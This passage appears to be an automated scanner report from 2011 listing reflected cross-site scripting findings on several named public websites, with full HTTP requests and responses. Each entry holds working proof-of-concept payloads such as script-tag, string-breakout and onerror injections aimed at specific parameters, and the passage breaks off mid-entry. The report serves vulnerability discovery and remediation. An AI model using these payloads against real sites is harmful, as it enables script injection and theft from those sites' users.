Set-Cookie: PHPSESSID=ka25urdt89ool7794ausasb6r5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
);
});
$( "#slider" ).bind( "slidechange", function(event, ui) {
setRadius( $(this).slider( "option", "value" ) );
radiusUrl = "/bloomfield-nm/shopping/musical-instruments/x229a6de"-alert(1)-"b1c598501c5?radius=RADIUS";
radiusUrl = radiusUrl.replace( 'RADIUS', $(this).slider( "option", "value" ) );
window.location = radiusUrl;
});
$( "select.f-left" ).change(function () {

...[SNIP]...

3.298. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92fce"><script>alert(1)</script>de7cf7e6ed3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bloomfield-nm/shopping/musical-instruments/x2292fce"><script>alert(1)</script>de7cf7e6ed3 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:18:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=fqj5h9h5515ffsn856fdnqpui5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<a rel="nofollow" href="/bloomfield-nm/shopping/musical-instruments/x2292fce"><script>alert(1)</script>de7cf7e6ed3?navs=39%2C394%2C135%2C80%2C832%2C618%2C0%2C0&nv1=Attractions">
...[SNIP]...

3.299. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa2f6"-alert(1)-"347f33fe799 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bloomfield-nm/shopping/musical-instruments/x22?aa2f6"-alert(1)-"347f33fe799=1 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:16:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=732g8mos0bpq6idorsb2stopq5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:16:52 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
;
});
$( "#slider" ).bind( "slidechange", function(event, ui) {
setRadius( $(this).slider( "option", "value" ) );
radiusUrl = "/bloomfield-nm/shopping/musical-instruments/x22?aa2f6"-alert(1)-"347f33fe799=1&radius=RADIUS";
radiusUrl = radiusUrl.replace( 'RADIUS', $(this).slider( "option", "value" ) );
window.location = radiusUrl;
});
$( "select.f-left" ).change(function () {

...[SNIP]...

3.300. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 145d2"><script>alert(1)</script>dfc358508db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bloomfield-nm/shopping/musical-instruments/x22?145d2"><script>alert(1)</script>dfc358508db=1 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:16:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=kplke0fp6227hhtnkrqq4j5p27; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<a rel="nofollow" href="/bloomfield-nm/shopping/musical-instruments/x22?145d2"><script>alert(1)</script>dfc358508db=1&navs=39%2C394%2C135%2C80%2C832%2C618%2C0%2C0&nv1=Attractions">
...[SNIP]...

3.301. https://r.espn.go.com/members/util/getUserInfo [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://r.espn.go.com
Path:   /members/util/getUserInfo

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload e042f<script>alert(1)</script>2f8618a1586 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /members/util/getUserInfo?cb=runOmnitureIndependentlye042f<script>alert(1)</script>2f8618a1586 HTTP/1.1
Host: r.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 108
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
p3p: CP=CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE

runOmnitureIndependentlye042f<script>alert(1)</script>2f8618a1586(null, null, null, null, null, null, null);

3.302. http://radar.weather.gov/radar_lite.php [loop parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://radar.weather.gov
Path:   /radar_lite.php

Issue detail

The value of the loop request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbf71"%20a%3db%20e62e3e0d62b was submitted in the loop parameter. This input was echoed as bbf71" a=b e62e3e0d62b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /radar_lite.php?product=N0R&rid=GYX&loop=nobbf71"%20a%3db%20e62e3e0d62b HTTP/1.1
Host: radar.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Age: 0
Date: Sat, 26 Feb 2011 02:18:31 GMT
Content-Length: 14076
Content-Type: text/html; charset=UTF-8
Expires: Sat, 26 Feb 2011 02:28:31 GMT
Cache-Control: max-age=600
Server: Apache
Via: 1.1 hyacinth (NetCache NetApp/6.0.3), 1.0 c3.w3.woc (squid)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head>
<title>National Weather Service radar from Portland, ME</title>
<meta nam
...[SNIP]...
<a class="navbar" href="radar.php?rid=gyx&overlays=11101111&product=N0R&loop=nobbf71" a=b e62e3e0d62b" title="Go to the Enhanced Version">
...[SNIP]...

3.303. http://radar.weather.gov/radar_lite.php [product parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://radar.weather.gov
Path:   /radar_lite.php

Issue detail

The value of the product request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b52b"%20a%3db%20b5abd972cb4 was submitted in the product parameter. This input was echoed as 3b52b\" a=b b5abd972cb4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /radar_lite.php?product=N0R3b52b"%20a%3db%20b5abd972cb4&rid=GYX&loop=no HTTP/1.1
Host: radar.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Age: 0
X-Cache-TTL: 172800
Date: Sat, 26 Feb 2011 02:15:01 GMT
Content-Length: 14089
Content-Type: text/html; charset=iso-8859-1
Expires: Mon, 28 Feb 2011 02:15:01 GMT
Cache-Control: max-age=172800
Server: Apache
Vary: Accept-Encoding
X-Cached-Time: Sat, 26 Feb 2011 02:15:01 GMT
Via: 1.1 nws-hq-cache03 (NetCache NetApp/6.0.7), 1.0 c3.w3.woc (squid)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head>
<title>National Weather Service radar from Portland, ME</title>
<meta nam
...[SNIP]...
<a class="navbar" href="radar.php?rid=gyx&overlays=11101111&product=N0R3b52b\" a=b b5abd972cb4&loop=no" title="Go to the Enhanced Version">
...[SNIP]...

3.304. http://recreationalequipmen.tt.omtrdc.net/m2/recreationalequipmen/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://recreationalequipmen.tt.omtrdc.net
Path:   /m2/recreationalequipmen/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload a34c8<script>alert(1)</script>edbd78759d0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/recreationalequipmen/mbox/standard?mboxHost=www.rei.com&mboxSession=1298667914619-871377&mboxPC=1298667914619-871377.17&mboxPage=1298667927682-403800&screenHeight=1200&screenWidth=1920&browserWidth=1437&browserHeight=954&browserTimeOffset=-360&colorDepth=16&mboxCount=1&mbox=recs_hpCustPicksa34c8<script>alert(1)</script>edbd78759d0&mboxId=0&mboxTime=1298646327740&mboxURL=http%3A%2F%2Fwww.rei.com%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: recreationalequipmen.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.rei.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 212
Date: Fri, 25 Feb 2011 21:06:33 GMT
Server: Test & Target

mboxFactories.get('default').get('recs_hpCustPicksa34c8<script>alert(1)</script>edbd78759d0',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1298667914619-871377.17");

3.305. http://recs.richrelevance.com/rrserver/p13n_generated.js [ctp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The value of the ctp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c3c1'%3balert(1)//3dbbc323ad9 was submitted in the ctp parameter. This input was echoed as 2c3c1';alert(1)//3dbbc323ad9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rrserver/p13n_generated.js?a=5387d7af823640a7&ts=1298696265845&cis=%7C72384&p=1a6ddbd&re=True&cts=http%3A%2F%2Fwww5.jcpenney.com%2Fjcp%2F&pt=%7Censemble_page.content1&s=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ctp=%7C0%3AcmOrigId%25253D1a6ddbd%252526cmTypeFlag%25253DRichRel%252526cmCatID%25253Dhomepage%25257C723842c3c1'%3balert(1)//3dbbc323ad9&pref=http%3A%2F%2Fwww4.jcpenney.com%2Fjcp%2FXGN.aspx%3Fn%3D4294953363%26catsel%3D4294953363--comforters%2B%2B%2Bbedspreads%26deptid%3D70750%26pcatid%3D70750%26catid%3D72384%26cattyp%3DSAL%26dep%3DBEDDING%26pcat%3DBEDDING%26cat%3DSale%26refpagename%3DDefault%25252Easpx%26refdeptid%3D%26refcatid%3D%26cmAMS_T%3DT1%26cmAMS_C%3DC3%26CmCatId%3Dhomepage&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://www5.jcpenney.com/jcp/X6E.aspx?GrpTyp=ENS&ItemID=1a6ddbd&deptid=70750&dep=BEDDING&catid=72384&pcat=BEDDING&cat=Sale&NOffset=0&CatSel=4294953363%7ccomforters+%2b+bedspreads&pcatid=70750&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage|72384
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=8f0d715c-e29a-4f38-9373-184b98130248

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 05:00:30 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: vihc=b126.1298696430236.43015778%7C; Path=/
Set-Cookie: pvihc=b126.1298696430236.43015778%7C; Expires=Tue, 23-Feb-2021 05:00:30 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 13433

var rr_recs={placements:[{used:false,placementType:'ensemble_page.content1',html:'<div class="rrOuterBox"> <div class="rrStrategyMessage" style="zoom: 1">Customers who viewed 400TC WrinkleGuard Bed
...[SNIP]...
818AD551CB2274291EC1105704&pg=615&p=1649c84&ct=http%3A%2F%2Fwww5.jcpenney.com%2Fjcp%2FX6E.aspx%3FGrptyp%3DENS%26ItemId%3D1649c84%26cmOrigId%3D1a6ddbd%26cmTypeFlag%3DRichRel%26cmCatID%3Dhomepage%7C723842c3c1';alert(1)//3dbbc323ad9\'">
...[SNIP]...

3.306. http://response.restoration.noaa.gov/orr_search.php [message parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /orr_search.php

Issue detail

The value of the message request parameter is copied into the HTML document as plain text between tags. The payload 702bd<script>alert(1)</script>df4883bec6d was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /orr_search.php?message=The%20page%20you%20requested%20was%20not%20found.%20Please%20use%20our%20search%20page%20to%20find%20what%20you%20were%20looking%20for.702bd<script>alert(1)</script>df4883bec6d HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7bf40be4e7088c5b50a95bc456b809b0

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 13:46:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16536

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en">

   <head>
       <meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
       <meta name="generator" cont
...[SNIP]...
<strong>The page you requested was not found. Please use our search page to find what you were looking for.702bd<script>alert(1)</script>df4883bec6d</strong>
...[SNIP]...

3.307. http://response.restoration.noaa.gov/orr_search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /orr_search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3c06b<script>alert(1)</script>96a6c1f2475 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /orr_search.php?message=The%20page%20you%20requested%20was%20not%20found.%20Please%20use%20our%20search%20page%20to%20find%20what%20you%20were%20looking%20/3c06b<script>alert(1)</script>96a6c1f2475for. HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7bf40be4e7088c5b50a95bc456b809b0

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 13:46:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16546

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en">

   <head>
       <meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
       <meta name="generator" cont
...[SNIP]...
<strong>The page you requested was not found. Please use our search page to find what you were looking /3c06b<script>alert(1)</script>96a6c1f2475for.</strong>
...[SNIP]...

3.308. http://rtb0.doubleverify.com/rtb.ashx/verifyc [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb0.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5975d<script>alert(1)</script>8e27cf83e0e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5027088&plc=56548503&sid=953349&num=1&ver=4&dv_url=http%3A//www.komonews.com/&callback=__verify_callback_2587954816405975d<script>alert(1)</script>8e27cf83e0e HTTP/1.1
Host: rtb0.doubleverify.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Wed, 23 Feb 2011 21:37:10 GMT
Content-Length: 74

__verify_callback_2587954816405975d<script>alert(1)</script>8e27cf83e0e(2)

3.309. http://sales.liveperson.net/hc/72961245/ [msessionkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/72961245/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 258a6<img%20src%3da%20onerror%3dalert(1)>590cda225df was submitted in the msessionkey parameter. This input was echoed as 258a6<img src=a onerror=alert(1)>590cda225df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

